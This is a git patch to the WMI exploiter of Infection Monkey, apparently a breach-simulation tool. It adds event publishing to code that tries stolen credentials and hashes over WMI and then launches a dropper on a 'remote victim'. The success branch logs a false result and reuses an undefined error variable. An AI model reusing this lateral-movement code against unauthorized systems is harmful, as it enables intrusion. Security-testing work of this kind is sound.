From ed191bcf6104b2ba9b62fc9a6e50f05a5a3049bd Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Fri, 7 Oct 2022 13:55:49 +0200 Subject: [PATCH] Agent: Publish events from WMI --- monkey/infection_monkey/exploit/wmiexec.py | 37 +++++++++++++--------- 1 file changed, 22 insertions(+), 15 deletions(-) diff --git a/monkey/infection_monkey/exploit/wmiexec.py b/monkey/infection_monkey/exploit/wmiexec.py index 0788ff813..0ccf5bfe6 100644 --- a/monkey/infection_monkey/exploit/wmiexec.py +++ b/monkey/infection_monkey/exploit/wmiexec.py @@ -2,6 +2,7 @@ import logging import ntpath import socket import traceback +from time import time from impacket.dcerpc.v5.rpcrt import DCERPCException @@ -44,6 +45,7 @@ class WmiExploiter(HostExploiter): wmi_connection = WmiTools.WmiConnection() + timestamp = time() try: wmi_connection.connect( self.host, @@ -55,26 +57,34 @@ class WmiExploiter(HostExploiter): ) except AccessDeniedException: self.report_login_attempt(False, user, password, lm_hash, ntlm_hash) - logger.debug(f"Failed connecting to {self.host} using WMI") + error_message = f"Failed connecting to {self.host} using WMI" + logger.debug(error_message) + self._publish_exploitation_event(timestamp, False, error_message=error_message) continue except DCERPCException: self.report_login_attempt(False, user, password, lm_hash, ntlm_hash) logger.debug(f"Failed connecting to {self.host} using WMI") + self._publish_exploitation_event(timestamp, False, error_message=error_message) continue except socket.error: - logger.debug(f"Network error in WMI connection to {self.host}") + error_message = f"Network error in WMI connection to {self.host}" + logger.debug(error_message) + self._publish_exploitation_event(timestamp, False, error_message=error_message) return self.exploit_result except Exception as exc: - logger.debug( + error_message = ( f"Unknown WMI connection error to {self.host}: " f"{exc} {traceback.format_exc()}" ) + logger.debug(error_message) + self._publish_exploitation_event(timestamp, False, error_message=error_message) return self.exploit_result self.report_login_attempt(True, user, password, lm_hash, ntlm_hash) self.exploit_result.exploitation_success = True + self._publish_exploitation_event(timestamp, False, error_message=error_message) downloaded_agent = self.agent_binary_repository.get_agent_binary(self.host.os["type"]) @@ -113,33 +123,30 @@ class WmiExploiter(HostExploiter): } + build_monkey_commandline(self.servers, self.current_depth + 1) # execute the remote monkey + propagation_timestamp = time() result = WmiTools.get_object(wmi_connection, "Win32_Process").Create( cmdline, ntpath.split(remote_full_path)[0], None ) if (0 != result.ProcessId) and (not result.ReturnValue): logger.info( - "Executed dropper '%s' on remote victim %r (pid=%d, cmdline=%r)", - remote_full_path, - self.host, - result.ProcessId, - cmdline, + f"Executed dropper '{remote_full_path}' on remote victim {self.host} " + f"(pid={result.ProcessId}, cmdline={cmdline})" ) self.add_vuln_port(port="unknown") self.exploit_result.propagation_success = True + self._publish_propagation_event(propagation_timestamp, True) else: error_message = ( - "Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, " - "cmdline=%r)", - remote_full_path, - self.host, - result.ProcessId, - result.ReturnValue, - cmdline, + f"Error executing dropper '{remote_full_path}' on remote victim {self.host} " + f"(pid={result.ProcessId}, exit_code={result.ReturnValue}, cmdline={cmdline})" ) logger.debug(error_message) self.exploit_result.error_message = error_message + self._publish_propagation_event( + propagation_timestamp, False, error_message=error_message + ) result.RemRelease() wmi_connection.close()